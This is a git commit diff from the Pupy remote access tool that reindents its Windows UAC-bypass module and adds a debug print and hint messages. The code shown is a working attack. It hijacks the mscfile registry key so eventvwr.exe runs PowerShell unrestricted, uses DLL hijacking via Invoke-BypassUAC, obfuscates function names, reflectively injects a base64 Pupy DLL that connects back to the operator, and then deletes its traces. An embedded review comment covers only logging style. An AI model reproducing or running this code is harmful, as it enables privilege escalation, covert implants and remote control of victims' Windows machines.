Print help msg if bypassuac failed + tabs to spaces

This commit is contained in:
quentinhardy 2016-11-03 06:59:03 -04:00
parent e3be286656
commit c874523600
3 changed files with 183 additions and 180 deletions


@ -20,30 +20,30 @@ class BypassUAC(PupyModule):
self.arg_parser.add_argument('-m', dest='method', choices=["eventvwr", "dll_hijacking"], default=None, help="Default: the technic will be choosen for you. 'dll_hijacking' for wind7-8.1 and 'eventvwr' for wind7-10.")
def run(self, args):
# check if a UAC Bypass can be done
if not self.client.conn.modules["pupwinutils.security"].can_get_admin_access():
self.error('Your are not on the local administrator group.')
return
# check if a UAC Bypass can be done
if not self.client.conn.modules["pupwinutils.security"].can_get_admin_access():
self.error('Your are not on the local administrator group.')
return
dll_hijacking = False
registry_hijacking = False
dll_hijacking = False
registry_hijacking = False
bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
# choose methods depending on the OS Version
if not args.method:
if self.client.desc['release'] == '10':
registry_hijacking = True
else:
dll_hijacking = True
elif args.method == "eventvwr":
registry_hijacking = True
else:
dll_hijacking = True
bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
# choose methods depending on the OS Version
if not args.method:
if self.client.desc['release'] == '10':
registry_hijacking = True
else:
dll_hijacking = True
elif args.method == "eventvwr":
registry_hijacking = True
else:
dll_hijacking = True
if registry_hijacking:
self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 targets...")
bypassUasModule.bypassuac_through_EventVwrBypass()
elif dll_hijacking:
# Invoke-BypassUAC.ps1 uses different technics to bypass depending on the Windows Version (Sysprep for Windows 7/2008 and NTWDBLIB.dll for Windows 8/2012)
self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...")
bypassUasModule.bypassuac_through_PowerSploitBypassUAC()
if registry_hijacking:
self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 targets...")
bypassUasModule.bypassuac_through_EventVwrBypass()
elif dll_hijacking:
# Invoke-BypassUAC.ps1 uses different technics to bypass depending on the Windows Version (Sysprep for Windows 7/2008 and NTWDBLIB.dll for Windows 8/2012)
self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...")
bypassUasModule.bypassuac_through_PowerSploitBypassUAC()


@ -15,122 +15,125 @@ import random, string
from pupylib.utils.rpyc_utils import redirected_stdo
class bypassuac():
def __init__(self, module, rootPupyPath):
self.module = module
self.module.client.load_package("pupwinutils.bypassuac_remote")
def __init__(self, module, rootPupyPath):
self.module = module
self.module.client.load_package("pupwinutils.bypassuac_remote")
#Remote paths
remoteTempFolder, systemRoot = self.module.client.conn.modules["pupwinutils.bypassuac_remote"].get_env_variables()
self.invokeReflectivePEInjectionRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt')
self.mainPowershellScriptRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1')
self.pupyDLLRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt')
self.invokeBypassUACRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1')
#Adding obfuscation on ps1 main function
self.bypassUAC_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7))
self.reflectivePE_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7))
#Remote paths
remoteTempFolder, systemRoot = self.module.client.conn.modules["pupwinutils.bypassuac_remote"].get_env_variables()
self.invokeReflectivePEInjectionRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt')
self.mainPowershellScriptRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1')
self.pupyDLLRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt')
self.invokeBypassUACRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1')
#Adding obfuscation on ps1 main function
self.bypassUAC_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7))
self.reflectivePE_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7))
#Define Local paths
self.pupyDLLLocalPath = os.path.join(gettempdir(),'dllFile.txt')
self.mainPowerShellScriptPrivilegedLocalPath = os.path.join(gettempdir(),'mainPowerShellScriptPrivileged.txt')
self.invokeReflectivePEInjectionLocalPath = os.path.join(rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1")
self.invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1")
def bypassuac_through_EventVwrBypass(self):
# '''
# Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)
# '''
# On a Windows 10 "C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe" does not exist, we cannot force to use a x64 bit powershell interpreter
# The pupy dll upload will be a 32 bit
if '64' in self.module.client.desc['proc_arch']:
upload_x86_dll = False
else:
upload_x86_dll = True
self.module.info('Uploading temporary files')
self.uploadPupyDLL(force_x86_dll=upload_x86_dll)
self.uploadPowershellScripts()
files_to_delete=[self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.pupyDLLRemotePath]
self.module.info('Altering the registry')
self.module.client.conn.modules["pupwinutils.bypassuac_remote"].registry_hijacking(self.mainPowershellScriptRemotePath, files_to_delete)
self.module.success("Waiting for a connection from the DLL (take few seconds)...")
def bypassuac_through_PowerSploitBypassUAC(self):
'''
Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1)
'''
#Constants
bypassUACcmd = "{InvokeBypassUAC} -Command 'powershell.exe -ExecutionPolicy Bypass -file {mainPowershell} -Verbose'".format(InvokeBypassUAC=self.bypassUAC_random_name, mainPowershell=self.mainPowershellScriptRemotePath)
self.module.info('Uploading temporary files')
self.uploadPowershellScripts()
self.uploadPupyDLL()
content = re.sub("Write-Verbose ","Write-Output ", open(self.invokeBypassUACLocalPath, 'r').read(), flags=re.I)
content = re.sub("Invoke-BypassUAC", self.bypassUAC_random_name, content, flags=re.I)
logging.debug("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd))
self.module.info('Starting the UAC Bypass process')
output = execute_powershell_script(self.module, content, bypassUACcmd, x64IfPossible=True)
logging.debug("BypassUAC script output: %s\n"%(output))
if "DLL injection complete!" in output:
self.module.success("UAC bypassed")
else:
self.module.warning("Impossible to know what's happened remotely. You should active debug mode.")
#Clean tmp files
tmp_files = [self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.invokeBypassUACRemotePath, self.pupyDLLRemotePath]
logging.debug("Deleting temporary files")
self.module.client.conn.modules["pupwinutils.bypassuac_remote"].deleteTHisRemoteFile(tmp_files)
#...
self.module.success("Waiting for a connection from the DLL (take few seconds)...")
def uploadPowershellScripts(self):
'''
Upload main powershell script and invokeReflectivePEInjection script
'''
mainPowerShellScriptPrivileged = """
cat {invoke_reflective_pe_injection} | Out-String | iex
cat {pupy_dll} | Out-String | iex
{InvokeReflectivePEInjection} -PEBytes $PEBytes -ForceASLR
""".format(invoke_reflective_pe_injection=self.invokeReflectivePEInjectionRemotePath, pupy_dll=self.pupyDLLRemotePath, InvokeReflectivePEInjection=self.reflectivePE_random_name)
logging.debug("Creating the Powershell script in %s locally"%(self.mainPowerShellScriptPrivilegedLocalPath))
with open(self.mainPowerShellScriptPrivilegedLocalPath, 'w+') as w:
w.write(mainPowerShellScriptPrivileged)
logging.debug("Uploading powershell code for DLL injection in {0}".format(self.invokeReflectivePEInjectionRemotePath))
content = re.sub("Invoke-ReflectivePEInjection", self.reflectivePE_random_name, open(self.invokeReflectivePEInjectionLocalPath).read(), flags=re.I)
tmp_file = os.path.join(gettempdir(),'reflective_pe.txt')
with open(tmp_file, 'w+') as w:
w.write(content)
upload(self.module.client.conn, tmp_file, self.invokeReflectivePEInjectionRemotePath)
logging.debug("Uploading main powershell script executed by BypassUAC in {0}".format(self.mainPowershellScriptRemotePath))
upload(self.module.client.conn, self.mainPowerShellScriptPrivilegedLocalPath, self.mainPowershellScriptRemotePath)
#Define Local paths
self.pupyDLLLocalPath = os.path.join(gettempdir(),'dllFile.txt')
self.mainPowerShellScriptPrivilegedLocalPath = os.path.join(gettempdir(),'mainPowerShellScriptPrivileged.txt')
self.invokeReflectivePEInjectionLocalPath = os.path.join(rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1")
self.invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1")
def bypassuac_through_EventVwrBypass(self):
# '''
# Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)
# '''
# On a Windows 10 "C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe" does not exist, we cannot force to use a x64 bit powershell interpreter
# The pupy dll upload will be a 32 bit
print repr(self.module.client.desc)
if '64' in self.module.client.desc['proc_arch']:
upload_x86_dll = False
else:
upload_x86_dll = True
self.module.info('Uploading temporary files')
self.uploadPupyDLL(force_x86_dll=upload_x86_dll)
self.uploadPowershellScripts()
files_to_delete=[self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.pupyDLLRemotePath]
self.module.info('Altering the registry')
self.module.client.conn.modules["pupwinutils.bypassuac_remote"].registry_hijacking(self.mainPowershellScriptRemotePath, files_to_delete)
self.module.success("Waiting for a connection from the DLL (take few seconds)...")
self.module.success("If nothing happened, try to migrate to another process and try again.")
def bypassuac_through_PowerSploitBypassUAC(self):
'''
Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1)
'''
#Constants
bypassUACcmd = "{InvokeBypassUAC} -Command 'powershell.exe -ExecutionPolicy Bypass -file {mainPowershell} -Verbose'".format(InvokeBypassUAC=self.bypassUAC_random_name, mainPowershell=self.mainPowershellScriptRemotePath)
self.module.info('Uploading temporary files')
self.uploadPowershellScripts()
self.uploadPupyDLL()
content = re.sub("Write-Verbose ","Write-Output ", open(self.invokeBypassUACLocalPath, 'r').read(), flags=re.I)
content = re.sub("Invoke-BypassUAC", self.bypassUAC_random_name, content, flags=re.I)
logging.debug("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd))
self.module.info('Starting the UAC Bypass process')
output = execute_powershell_script(self.module, content, bypassUACcmd, x64IfPossible=True)
logging.debug("BypassUAC script output: %s\n"%(output))
if "DLL injection complete!" in output:
self.module.success("UAC bypassed")
else:
self.module.warning("Impossible to know what's happened remotely. You should active debug mode.")
#Clean tmp files
tmp_files = [self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.invokeBypassUACRemotePath, self.pupyDLLRemotePath]
logging.debug("Deleting temporary files")
self.module.client.conn.modules["pupwinutils.bypassuac_remote"].deleteTHisRemoteFile(tmp_files)
#...
self.module.success("Waiting for a connection from the DLL (take few seconds)...")
self.module.success("If nothing happened, try to migrate to another process and try again.")
def uploadPowershellScripts(self):
'''
Upload main powershell script and invokeReflectivePEInjection script
'''
mainPowerShellScriptPrivileged = """
cat {invoke_reflective_pe_injection} | Out-String | iex
cat {pupy_dll} | Out-String | iex
{InvokeReflectivePEInjection} -PEBytes $PEBytes -ForceASLR
""".format(invoke_reflective_pe_injection=self.invokeReflectivePEInjectionRemotePath, pupy_dll=self.pupyDLLRemotePath, InvokeReflectivePEInjection=self.reflectivePE_random_name)
logging.debug("Creating the Powershell script in %s locally"%(self.mainPowerShellScriptPrivilegedLocalPath))
with open(self.mainPowerShellScriptPrivilegedLocalPath, 'w+') as w:
w.write(mainPowerShellScriptPrivileged)
logging.debug("Uploading powershell code for DLL injection in {0}".format(self.invokeReflectivePEInjectionRemotePath))
content = re.sub("Invoke-ReflectivePEInjection", self.reflectivePE_random_name, open(self.invokeReflectivePEInjectionLocalPath).read(), flags=re.I)
tmp_file = os.path.join(gettempdir(),'reflective_pe.txt')
with open(tmp_file, 'w+') as w:
w.write(content)
upload(self.module.client.conn, tmp_file, self.invokeReflectivePEInjectionRemotePath)
logging.debug("Uploading main powershell script executed by BypassUAC in {0}".format(self.mainPowershellScriptRemotePath))
upload(self.module.client.conn, self.mainPowerShellScriptPrivilegedLocalPath, self.mainPowershellScriptRemotePath)
def uploadPupyDLL(self, force_x86_dll=False):
'''
Upload pupy dll as a txt file
'''
res=self.module.client.conn.modules['pupy'].get_connect_back_host()
host, port = res.rsplit(':',1)
logging.debug("Address configured is %s:%s for pupy dll..."%(host,port))
logging.debug("Looking for process architecture...")
def uploadPupyDLL(self, force_x86_dll=False):
'''
Upload pupy dll as a txt file
'''
res=self.module.client.conn.modules['pupy'].get_connect_back_host()
host, port = res.rsplit(':',1)
logging.debug("Address configured is %s:%s for pupy dll..."%(host,port))
logging.debug("Looking for process architecture...")
if "64" in self.module.client.desc["os_arch"] and not force_x86_dll:
logging.debug("Target achitecture is x64, using a x64 dll")
dllbuff=pupygen.get_edit_pupyx64_dll(self.module.client.get_conf())
else:
logging.debug("Target achitecture is x86, using a x86 dll")
dllbuff=pupygen.get_edit_pupyx86_dll(self.module.client.get_conf())
logging.debug("Creating the pupy dll in %s locally"%(self.pupyDLLLocalPath))
with open(self.pupyDLLLocalPath, 'w+') as w:
w.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff)))
logging.debug("Uploading pupy dll in {0}".format(self.pupyDLLRemotePath))
upload(self.module.client.conn, self.pupyDLLLocalPath, self.pupyDLLRemotePath)
if "64" in self.module.client.desc["os_arch"] and not force_x86_dll:
logging.debug("Target achitecture is x64, using a x64 dll")
dllbuff=pupygen.get_edit_pupyx64_dll(self.module.client.get_conf())
else:
logging.debug("Target achitecture is x86, using a x86 dll")
dllbuff=pupygen.get_edit_pupyx86_dll(self.module.client.get_conf())
logging.debug("Creating the pupy dll in %s locally"%(self.pupyDLLLocalPath))
with open(self.pupyDLLLocalPath, 'w+') as w:
w.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff)))
logging.debug("Uploading pupy dll in {0}".format(self.pupyDLLRemotePath))
upload(self.module.client.conn, self.pupyDLLLocalPath, self.pupyDLLRemotePath)
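Review bot: The new line `print repr(self.module.client.desc)` at the top of bypassuac_through_EventVwrBypass reads as a leftover debugging statement: it dumps the whole client descriptor to stdout on every run and bypasses the module's own info/success/warning channels that the rest of the method uses. Either drop it or route it through the logger the file already uses, `logging.debug("client desc: %r", self.module.client.desc)`. The two added lines `self.module.success("If nothing happened, try to migrate to another process and try again.")` also report a troubleshooting hint at success level, although the preceding `warning` branch in bypassuac_through_PowerSploitBypassUAC already admits the method cannot tell whether the bypass worked; `self.module.info(...)` is the matching level so that operators reading the log do not mistake the hint for a confirmed result. Apart from these three lines the hunk appears to be a tab-to-space reindent only.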


@ -4,51 +4,51 @@ import subprocess
from _winreg import *
def deleteTHisRemoteFile(tmp_files):
for file in tmp_files:
try:
os.remove(file)
except Exception, e:
pass
for file in tmp_files:
try:
os.remove(file)
except Exception, e:
pass
def get_env_variables():
try:
tmp = os.path.expandvars("%TEMP%")
except:
tmp = os.path.expandvars("%APPDATA%")
sysroot = os.path.expandvars("%SYSTEMROOT%")
return tmp, sysroot
try:
tmp = os.path.expandvars("%TEMP%")
except:
tmp = os.path.expandvars("%APPDATA%")
sysroot = os.path.expandvars("%SYSTEMROOT%")
return tmp, sysroot
def registry_hijacking(mainPowershellScriptRemotePath, files_to_delete):
# '''
# Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)
# '''
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
powershellPath = '%s\\system32\\WindowsPowerShell\\v1.0\\powershell.exe' % os.path.expandvars("%SYSTEMROOT%")
mscCmdPath = "Software\Classes\mscfile\shell\open\command"
cmd = "{1} -ExecutionPolicy Bypass -File {0}".format(mainPowershellScriptRemotePath, powershellPath)
try:
# The registry key already exist in HKCU, altering...
key = OpenKey(HKCU, mscCmdPath, KEY_SET_VALUE)
except:
# Adding the registry key in HKCU
key = CreateKey(HKCU, mscCmdPath)
# '''
# Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)
# '''
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
powershellPath = '%s\\system32\\WindowsPowerShell\\v1.0\\powershell.exe' % os.path.expandvars("%SYSTEMROOT%")
mscCmdPath = "Software\Classes\mscfile\shell\open\command"
cmd = "{1} -ExecutionPolicy Bypass -File {0}".format(mainPowershellScriptRemotePath, powershellPath)
try:
# The registry key already exist in HKCU, altering...
key = OpenKey(HKCU, mscCmdPath, KEY_SET_VALUE)
except:
# Adding the registry key in HKCU
key = CreateKey(HKCU, mscCmdPath)
registry_key = OpenKey(HKCU, mscCmdPath, 0, KEY_WRITE)
SetValueEx(registry_key, '', 0, REG_SZ, cmd)
CloseKey(registry_key)
# Executing eventvwr.exe
eventvwrPath = os.path.join(os.environ['WINDIR'],'System32','eventvwr.exe')
output = subprocess.check_output(eventvwrPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
registry_key = OpenKey(HKCU, mscCmdPath, 0, KEY_WRITE)
SetValueEx(registry_key, '', 0, REG_SZ, cmd)
CloseKey(registry_key)
# Executing eventvwr.exe
eventvwrPath = os.path.join(os.environ['WINDIR'],'System32','eventvwr.exe')
output = subprocess.check_output(eventvwrPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
# Sleeping 5 secds...
time.sleep(5)
#Clean everything
DeleteKey(HKCU, mscCmdPath)
deleteTHisRemoteFile(files_to_delete)
# Sleeping 5 secds...
time.sleep(5)
#Clean everything
DeleteKey(HKCU, mscCmdPath)
deleteTHisRemoteFile(files_to_delete)